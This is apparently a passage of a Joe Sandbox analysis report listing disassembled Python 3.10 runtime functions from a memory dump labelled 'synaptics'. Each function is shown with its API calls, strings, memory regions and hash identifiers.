                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromModuleSpecType_
                                                                                                                                                                                                      • String ID: 4$8$@$A$B$G$H$Out of memory and PyExc_MemoryError is not initialized yet$_PyErr_NoMemory
                                                                                                                                                                                                      • API String ID: 1819871884-2773144358
                                                                                                                                                                                                      • Opcode ID: d045e01e946fe2c7a2c02cb825760be68335c5006dba265635e290b2c2dc3a9d
                                                                                                                                                                                                      • Instruction ID: da2a3c3402ca72b4c4214880df8f7c6d15a28bda3ca481a0a98b252ccc915154
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d045e01e946fe2c7a2c02cb825760be68335c5006dba265635e290b2c2dc3a9d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 944145B16093009FD710CF19D889B4BFBF4EF85318F208A2DE5589B690DB76D908CB96
                                                                                                                                                                                                      Function 6C5BDC50 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 108COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Python\traceback.c,0000025E,00000000,00000000,6C5B0104,?,?,6C5B038B,D0FF1840,00000000), ref: 6C5BDC8B
                                                                                                                                                                                                      • PySys_GetObject.PYTHON310(tracebacklimit,00000000,00000000,6C5B0104,?,?,6C5B038B,D0FF1840,00000000), ref: 6C5BDCA2
                                                                                                                                                                                                      • PyLong_AsLongAndOverflow.PYTHON310(00000000,00000000,00000000), ref: 6C5BDCC1
                                                                                                                                                                                                      • PyErr_SetString.PYTHON310(null file for PyFile_WriteString,00000000), ref: 6C5BDCFC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Python\traceback.c, xrefs: 6C5BDC7A
                                                                                                                                                                                                      • null file for PyFile_WriteString, xrefs: 6C5BDCF1
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C5BDC7F
                                                                                                                                                                                                      • Pntl, xrefs: 6C5BDC67
                                                                                                                                                                                                      • Traceback (most recent call last):, xrefs: 6C5BDD16
                                                                                                                                                                                                      • tracebacklimit, xrefs: 6C5BDC9D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatLongLong_ObjectOverflowStringSys_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Python\traceback.c$Pntl$Traceback (most recent call last):$null file for PyFile_WriteString$tracebacklimit
                                                                                                                                                                                                      • API String ID: 3791693245-1176586457
                                                                                                                                                                                                      • Opcode ID: 3b8ba228be9e6bb2fa2cae0228ce23ac7d31060c7cd607622f12990b46bc5495
                                                                                                                                                                                                      • Instruction ID: a646875d453532fd4622eae8e35f2a23b5a8d997de159fe74e1ed5cee2fca84d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b8ba228be9e6bb2fa2cae0228ce23ac7d31060c7cd607622f12990b46bc5495
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C314872B012049BC7109B99EC51E957BA8EB81379F140375FD1CA7B91E732D90583E1
                                                                                                                                                                                                      Function 6C480840 Relevance: 19.6, APIs: 13, Instructions: 72COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyStructSequence_New.PYTHON310(6C751978), ref: 6C48084F
                                                                                                                                                                                                        • Part of subcall function 6C4B2050: _PyObject_GC_NewVar.PYTHON310(6C751978,00000000,?,?,?,?,6C480854,6C751978), ref: 6C4B207F
                                                                                                                                                                                                      • PyFloat_FromDouble.PYTHON310 ref: 6C480871
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000400), ref: 6C48087E
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000134,00000400), ref: 6C48088B
                                                                                                                                                                                                        • Part of subcall function 6C491A40: _PyLong_New.PYTHON310(00000001,00000000,?,?,?,6C480883,00000400), ref: 6C491A96
                                                                                                                                                                                                      • PyFloat_FromDouble.PYTHON310 ref: 6C4808A3
                                                                                                                                                                                                        • Part of subcall function 6C480940: _PyErr_NoMemory.PYTHON310(00000000,?,6C480876), ref: 6C4809CB
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(FFFFFC03), ref: 6C4808B0
                                                                                                                                                                                                        • Part of subcall function 6C491A40: _PyLong_New.PYTHON310(00000002,00000000,?,?,?,6C480883,00000400), ref: 6C491ABC
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(FFFFFECD,FFFFFC03), ref: 6C4808BD
                                                                                                                                                                                                        • Part of subcall function 6C491A40: _PyLong_New.PYTHON310(00000000,00000000,?,?,?,6C480883,00000400), ref: 6C491AF9
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(0000000F,FFFFFECD,FFFFFC03), ref: 6C4808C7
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000035,0000000F,FFFFFECD,FFFFFC03), ref: 6C4808D1
                                                                                                                                                                                                      • PyFloat_FromDouble.PYTHON310 ref: 6C4808E9
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000002), ref: 6C4808F3
                                                                                                                                                                                                      • __fpe_flt_rounds.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002), ref: 6C4808FB
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000000), ref: 6C480902
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromLong_$Long$DoubleFloat_$Err_MemoryObject_Sequence_Struct__fpe_flt_rounds
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3847755086-0
                                                                                                                                                                                                      • Opcode ID: fdafb39a6f6a6448739fc9d184fa1ae1d57d25f159afea361e630b2b58ac5d74
                                                                                                                                                                                                      • Instruction ID: 404b6e1052d225e072c060bed953dbc2d4b6272d4849cd0c343f6b5782b94c3f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fdafb39a6f6a6448739fc9d184fa1ae1d57d25f159afea361e630b2b58ac5d74
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5321C471D02B104BD720EF799905E9ABBF4AF01624F000B2DD89A9BF81EB34E558CBC5
                                                                                                                                                                                                      Function 6C5BDA10 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 194threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromFormat.PYTHON310( [Previous line repeated %ld more times],?,-000000FF), ref: 6C5BDAC5
                                                                                                                                                                                                      • PyFile_WriteObject.PYTHON310(00000000,?,00000001,00000000,000003E8,?,?,?,?,?,?,?,6C5BDD58,000003E8), ref: 6C5BDADF
                                                                                                                                                                                                        • Part of subcall function 6C47F540: _PyErr_SetString.PYTHON310(00000000,6C73BFE8,writeobject with NULL file), ref: 6C47F41C
                                                                                                                                                                                                      • PyUnicode_FromFormat.PYTHON310( File "%U", line %d, in %U,?,?,?,-000000FF), ref: 6C5BDB52
                                                                                                                                                                                                      • PyFile_WriteObject.PYTHON310(00000000,?,00000001), ref: 6C5BDB6D
                                                                                                                                                                                                      • _Py_DisplaySourceLine.PYTHON310(?,?,?,00000004), ref: 6C5BDB9E
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?), ref: 6C5BDBB0
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C5BDBD9
                                                                                                                                                                                                      • _PyErr_CheckSignalsTstate.PYTHON310(?), ref: 6C5BDBF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • File "%U", line %d, in %U, xrefs: 6C5BDB4D
                                                                                                                                                                                                      • [Previous line repeated %ld more time], xrefs: 6C5BDABC
                                                                                                                                                                                                      • [Previous line repeated %ld more times], xrefs: 6C5BDAB3, 6C5BDAC4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$File_FormatFromObjectUnicode_Write$CheckClearCurrentDisplayLineSignalsSourceStringThreadTstate
                                                                                                                                                                                                      • String ID: File "%U", line %d, in %U$ [Previous line repeated %ld more time]$ [Previous line repeated %ld more times]
                                                                                                                                                                                                      • API String ID: 1488760516-3912477889
                                                                                                                                                                                                      • Opcode ID: 07d3f2b7d7d6093ab7a9ff4ccf511c33720c2119a323b11d1cb4a178a7e625be
                                                                                                                                                                                                      • Instruction ID: 2286ff74ffca97356465a0a4fd0ed02ff07cc5a8af9e2b657d38dd432dda4abc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07d3f2b7d7d6093ab7a9ff4ccf511c33720c2119a323b11d1cb4a178a7e625be
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79617D71A087028BC704CF29CC9091ABBF1FF85768F14472CE869A7B94D771E945CB92
                                                                                                                                                                                                      Function 6C4E2A00 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,bad argument type for built-in operation), ref: 6C4E2A22
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • PyUnicode_FromWideChar.PYTHON310(?,?), ref: 6C4E2A3B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • invalid decimal Unicode string, xrefs: 6C4E2B47
                                                                                                                                                                                                      • decimal, xrefs: 6C4E2B52
                                                                                                                                                                                                      • sOnns, xrefs: 6C4E2B57
                                                                                                                                                                                                      • codec must pass exception instance, xrefs: 6C4E2B8E
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C4E2A16
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$CharFromObjectStringUnicode_Wide
                                                                                                                                                                                                      • String ID: bad argument type for built-in operation$codec must pass exception instance$decimal$invalid decimal Unicode string$sOnns
                                                                                                                                                                                                      • API String ID: 471010646-2346896832
                                                                                                                                                                                                      • Opcode ID: 84814146606330e1ffc717da232354569a8007653300994734db7312b359d182
                                                                                                                                                                                                      • Instruction ID: 006faf10caca4ab9d317315e871e0235ed36aba38087d72dd56832cd1d3dac36
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84814146606330e1ffc717da232354569a8007653300994734db7312b359d182
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 655187B1A402179FC730DF18DC85F9A77A4EB4932AF060669EC2487B91DB75E942C7A0
                                                                                                                                                                                                      Function 6C491CB0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310 ref: 6C491CDD
                                                                                                                                                                                                      • _finite.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C491CFB
                                                                                                                                                                                                      • _isnan.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C491D1B
                                                                                                                                                                                                      • _isnan.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C491D41
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000,00000000,00000000,00000000), ref: 6C491D72
                                                                                                                                                                                                      • frexp.API-MS-WIN-CRT-MATH-L1-1-0(?,?), ref: 6C491DC5
                                                                                                                                                                                                      • _PyLong_New.PYTHON310(?,?,?), ref: 6C491DEB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • cannot convert float NaN to integer, xrefs: 6C491D55
                                                                                                                                                                                                      • cannot convert float infinity to integer, xrefs: 6C491D2D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Long__isnan$Err_FromLongObject_finitefrexp
                                                                                                                                                                                                      • String ID: cannot convert float NaN to integer$cannot convert float infinity to integer
                                                                                                                                                                                                      • API String ID: 4267141605-126850158
                                                                                                                                                                                                      • Opcode ID: 93f3cbffff33cd20741f7cf5b627dbc522b5cdc1ce276903a36ec49541d3821b
                                                                                                                                                                                                      • Instruction ID: 6cf283638e072b391e9c2295f02b1281dbc849fc319d4d94b585240c5fd7a469
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93f3cbffff33cd20741f7cf5b627dbc522b5cdc1ce276903a36ec49541d3821b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E516A32E04A148BC701EF38D805A5A7BB9EF86395F04476EEC49AB740EB31E559C7C2
                                                                                                                                                                                                      Function 6C4A2AF0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C504), ref: 6C4A2B00
                                                                                                                                                                                                      • _PyObject_LookupAttr.PYTHON310(?,00000000,?), ref: 6C4A2B1A
                                                                                                                                                                                                      • PyObject_Str.PYTHON310(?), ref: 6C4A2B32
                                                                                                                                                                                                        • Part of subcall function 6C4A2850: GetCurrentThreadId.KERNEL32 ref: 6C4A2875
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C514), ref: 6C4A2B47
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromObject_Unicode_$AttrCurrentLookupThread
                                                                                                                                                                                                      • String ID: %S()$%S.%S()
                                                                                                                                                                                                      • API String ID: 3749682894-2590559990
                                                                                                                                                                                                      • Opcode ID: 8431b6bfda1db7eeb76daa8a20cc3d491a8bd84ec7a20a644f8d75f5c56801e4
                                                                                                                                                                                                      • Instruction ID: 77fba2e167658900caf165c8e7ceb689058abccade03144f97ebaf0442a0004c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8431b6bfda1db7eeb76daa8a20cc3d491a8bd84ec7a20a644f8d75f5c56801e4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06313B719041036BD614DED6AC05EAA7B549F6422EF00462CFC2C86B55FF21D91BD7D3
                                                                                                                                                                                                      Function 6C551C60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,6C73E848), ref: 6C551C76
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,6C73DC90), ref: 6C551C8D
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,6C73F1E0), ref: 6C551CA4
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(don't know how to handle %.200s in error callback,?), ref: 6C551CBE
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      • PyUnicodeDecodeError_GetEnd.PYTHON310(?,?), ref: 6C551CD1
                                                                                                                                                                                                      • PyUnicodeEncodeError_GetEnd.PYTHON310(?,?), ref: 6C551CDD
                                                                                                                                                                                                      • PyUnicode_New.PYTHON310(00000000,00000000,?), ref: 6C551CEE
                                                                                                                                                                                                      • Py_BuildValue.PYTHON310((Nn),00000000,?,?), ref: 6C551CFC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_SubtypeType_$Error_FormatUnicodeUnicode_$BuildClearDecodeEncodeFromObjectValue
                                                                                                                                                                                                      • String ID: (Nn)$Hsl$don't know how to handle %.200s in error callback
                                                                                                                                                                                                      • API String ID: 1756006288-145469102
                                                                                                                                                                                                      • Opcode ID: 90bb0d07768f61c77c0700889b8ec743760ab87a243877d749c8302af7dd1029
                                                                                                                                                                                                      • Instruction ID: b996c9d1ea406fab404cd63f1f585ca42b2a59140c3c9bc2e52c6771c75f017d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90bb0d07768f61c77c0700889b8ec743760ab87a243877d749c8302af7dd1029
